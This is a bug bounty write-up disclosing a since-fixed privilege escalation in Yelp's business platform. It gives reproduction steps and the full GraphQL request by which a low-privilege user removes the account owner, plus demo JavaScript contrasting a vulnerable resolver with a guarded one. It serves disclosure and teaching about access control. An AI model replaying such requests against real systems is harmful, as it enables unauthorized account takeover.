
Privilege Escalation Vulnerability in Yelp Business Platform – A Security Analysis

Author: Vijaysimha Reddy
Updated: January 1, 2025
12 mins read

About the Author

Vijaysimha Reddy is a Security Engineering Manager at AppSecure and a security researcher specializing in web application security and bug bounty hunting. He is recognized as a Top 10 Bug bounty hunter on Yelp, BigCommerce, Coda, and Zuora, having reported multiple critical vulnerabilities to leading tech companies. Vijay actively contributes to the security community through in-depth technical write-ups and research on API security and access control flaws.

Overview

This post details a privilege escalation vulnerability discovered in Yelp’s business platform, which allowed a low-privileged user to bypass access controls and remove business owners from their own accounts. The issue stemmed from improper permission enforcement in a GraphQL API operation, creating a critical security risk.

The vulnerability could lead to unauthorized removal of business owners, potentially disrupting business operations and compromising account ownership. This post provides a technical breakdown of the flaw, steps to reproduce it, and how Yelp resolved the issue.

About Yelp Business Application:

Yelp Business is a comprehensive platform designed for business owners to manage their online presence on Yelp. It provides tools for businesses to update their information, respond to reviews, track customer engagement, and manage their business profile. The Yelp Business web application has an option to invite other users to manage the business page. The newly invited users have access to every functionality except the User Management page.

Vulnerability Description - Privilege Escalation

This vulnerability represents a security flaw in the access control mechanism of Yelp's business platform. The issue stems from insufficient permission checks at the GraphQL API level, where the application fails to properly validate user permissions when executing the RemoveBizUserFromOrg operation.

Despite the user interface correctly restricting access to the User Management module for low-privileged users, the underlying API endpoint remains accessible and functional, creating a privilege escalation path that could remove the owner from the business account.

Steps to reproduce:

  1. Go to https://biz.yelp.com and log in to the low-privilege user account (Attacker).
  2. Go to the account settings page. It can be observed that all the modules are accessible except the 'User Management' tab.
[Screenshot: Yelp Bug bounty writeup - POC1]
  3. Capture any authenticated request from the low-privilege user and copy the cookies.
  4. Replay the ‘RemoveBizUserFromOrg’ GraphQL operation using the low-privilege user's cookies, the user ID of the business owner and the business ID. The application removes the owner of the business account using the low-privilege user's cookies without any error.

Vulnerable request:

POST /gql/batch HTTP/2
Host: biz.yelp.com
Cookie: redacted
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Apollo-Operation-Name: RemoveBizUserFromOrg
Content-Length: 248
Origin: https://biz.yelp.com
Referer: https://biz.yelp.com/settings/user_management?userType=managedBizUsers&organizationId=ZqPIaCI91rhO55TOuPFWWA
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

[{"operationName":"RemoveBizUserFromOrg","variables":{"orgId":"ZqPIaCI91rhO55TOuPFWWA","bizUserId":"Jc0JNLG1EHMMeXO0000000"},"extensions":{"operationType":"mutation","documentId":"e754e519c255dc44281473c8b5f33869da51b03bb232eeb21cb42a1fc960c178"}}]

The Yelp team fixed the vulnerability by adding server-side permission checks to the vulnerable API. The API now responds with a ‘Biz user is not a pseudo admin’ error message if a low-privilege user tries to remove other users.
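To make the flaw in the Vulnerability Description and the fix described above concrete, the following is an added example written for this post; it is not Yelp's code, and nothing is known about how their GraphQL server is actually structured. It models an organization's user roster in memory and shows a RemoveBizUserFromOrg resolver in two forms: one that, like the vulnerable endpoint, only checks that the caller belongs to the organization, and one placed behind a server-side guard that also checks the caller's role. The role names, user IDs, the organization ID and the resolver-map layout are assumptions made for the demo; only the operation name and the error text come from the write-up.

```javascript
const ROLE_OWNER = "owner";     // assumption: the "pseudo admin" role that owns the business
const ROLE_MANAGER = "manager"; // assumption: the role an invited, low-privilege user gets

// Constructed sample organization: one owner and one invited manager.
function makeOrg() {
  return {
    orgId: "org-example",
    members: new Map([
      ["user-owner", ROLE_OWNER],
      ["user-manager", ROLE_MANAGER],
    ]),
  };
}

// Vulnerable resolver: only checks that the caller belongs to the org and
// relies on the UI having hidden the User Management page from managers.
function removeBizUserFromOrgVulnerable(org, ctx, args) {
  if (!org.members.has(ctx.callerId)) throw new Error("caller is not a member");
  if (!org.members.has(args.bizUserId)) throw new Error("no such user");
  org.members.delete(args.bizUserId);
  return { removed: args.bizUserId };
}

// Guard that runs on the server before a mutation resolver: the caller must
// be a member of the org named in the arguments (object-level check) and hold
// the required role (function-level check). The role comes from the server's
// own membership data, never from anything the client sends.
function requireOrgRole(requiredRole, resolver) {
  return function guarded(org, ctx, args) {
    if (args.orgId !== org.orgId) throw new Error("org mismatch");
    const callerRole = org.members.get(ctx.callerId);
    if (callerRole === undefined) throw new Error("caller is not a member");
    if (callerRole !== requiredRole) throw new Error("Biz user is not a pseudo admin");
    return resolver(org, ctx, args);
  };
}

// Fixed resolver: the same mutation body behind the server-side guard.
const removeBizUserFromOrgFixed = requireOrgRole(ROLE_OWNER, (org, ctx, args) => {
  if (!org.members.has(args.bizUserId)) throw new Error("no such user");
  org.members.delete(args.bizUserId);
  return { removed: args.bizUserId };
});

// Resolver map in the shape an Apollo-style server might use (assumption),
// keyed by the operation name seen in the captured request, so every
// mutation is visibly wrapped and a missing guard stands out in code review.
const Mutation = {
  RemoveBizUserFromOrg: removeBizUserFromOrgFixed,
};

// Replays the mutation from the write-up as the low-privilege user against a
// resolver and reports whether the owner survived and what error, if any,
// the caller received.
function replayAsManager(resolver) {
  const org = makeOrg();
  const ctx = { callerId: "user-manager" }; // identity derived from the session cookie
  const args = { orgId: org.orgId, bizUserId: "user-owner" };
  let error = null;
  try {
    resolver(org, ctx, args);
  } catch (e) {
    error = e.message;
  }
  return { ownerStillPresent: org.members.has("user-owner"), error };
}

// Checks that the owner can still remove the manager through the guarded
// resolver, i.e. that the fix did not break the legitimate path.
function replayAsOwner() {
  const org = makeOrg();
  const result = Mutation.RemoveBizUserFromOrg(
    org,
    { callerId: "user-owner" },
    { orgId: org.orgId, bizUserId: "user-manager" }
  );
  return { removed: result.removed, managerStillPresent: org.members.has("user-manager") };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", replayAsManager(removeBizUserFromOrgVulnerable));
  console.log("fixed:     ", replayAsManager(removeBizUserFromOrgFixed));
  console.log("owner path:", replayAsOwner());
}
```

The point of the wrapper is that the permission decision lives next to the mutation it protects and is evaluated on every request, regardless of which pages the front end shows to the caller; a resolver map where each entry is wrapped also gives reviewers a single place to spot a mutation that is missing its guard.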

Reference:

https://hackerone.com/reports/2396571

Timeline:

  • Report Submission: February 29th 2024
  • Triaged: March 12th 2024
  • Fix Deployed: April 17th 2024
  • Bounty Awarded: 1250 USD on June 11th, 2024